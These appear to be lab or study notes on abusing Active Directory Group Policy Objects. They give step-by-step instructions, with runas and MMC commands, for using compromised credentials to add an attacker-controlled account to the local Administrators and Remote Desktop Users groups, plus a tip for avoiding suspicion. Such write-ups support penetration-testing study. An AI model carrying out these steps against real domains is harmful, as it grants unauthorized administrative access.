Group Policy Objects
Group Policy Objects
(GPO) is a Virtual Collection of Policy Settings. Each GPO has a Unique Name, called a GUID. AD GPO's are Stored in the SYSVOL
Directory.
Each Windows Computer has a Local Policy Configuration. This contains Several notable Configurations such as, Application Configurations, Local Group Membership (Administrator - Remote Desktop Users Groups), Startup Configurations, Security Settings etc..
Exploiting GPO's
Administrators
The simplest Solution would be adding an AD Account we Control to both the Local Administrators and Local Remote Desktop Users Groups.
This would also allow us to use the SSH, but not many Organizations have Upgrades to provide SSH Access. RDP and Lateral Movements with Tools like SMBExec
are Better.
In order to Modify the GPO, we need to access Group Policy Management as the AD User that has the relevant Permissions.
We could RDP
into the Server with the Credentials of the User which has the Permissions to Modify the GPO, but that may Kick the User out of their Active Session, raising Suspicions.
Suggested Method: RDP into a Machine you have Access with a Low Privileged User. Inject the AD User Credentials into Memory using the runas
Command, and open MMC
to Modify the GPO.
:: Provide the Password once Prompted
runas /netonly /user:za.adobe.loc\AD-Username cmd.exe
:: Verify that you provided the Correct Credentials
dir \\za.adobe.loc\sysvol
:: Start the Microsoft Management Console
mmc
Microsoft Management Console
- Next Step is to add the Group Policy Management
Snap-In
:- Click File ➜ Add/Remove Snap-In
- Select the Group Policy Management Snap-In and click Add
- Click OK
We can now navigate to the GPO that our User has Permission to Modify (Servers > Management Servers > Management Server Pushes).
We can Right-Click on the GPO and select Edit. This will Open the new Group Policy Management Editor Window.
- To add our account to the Local Groups, we need to perform this Steps:
- Expand Computer Configuration
- Expand Policies
- Expand Windows Settings
- Expand Security Settings
- Right Click on Restricted Groups and select Add Group
- Click Browse, enter
[The Group Name you want to Compromise]
and click Check Names - Click Okay Twice
The First Filter is not used. For the Second Filter, we want to add both the Administrators
and Remote Desktop Users
Groups.
Once the configuration has been made, we can click Apply and OK.
Now we need a maximum of 15 Minutes for the GPO to be Applied (This can be Changed by the System Administrators).
After this, our Account that is Part of the Compromised Group
will now have Administrative and RDP Permissions on the Server that the Administrative User Applied the Settings.
:: This Command can be Used to Verify the Permissions
whoami /groups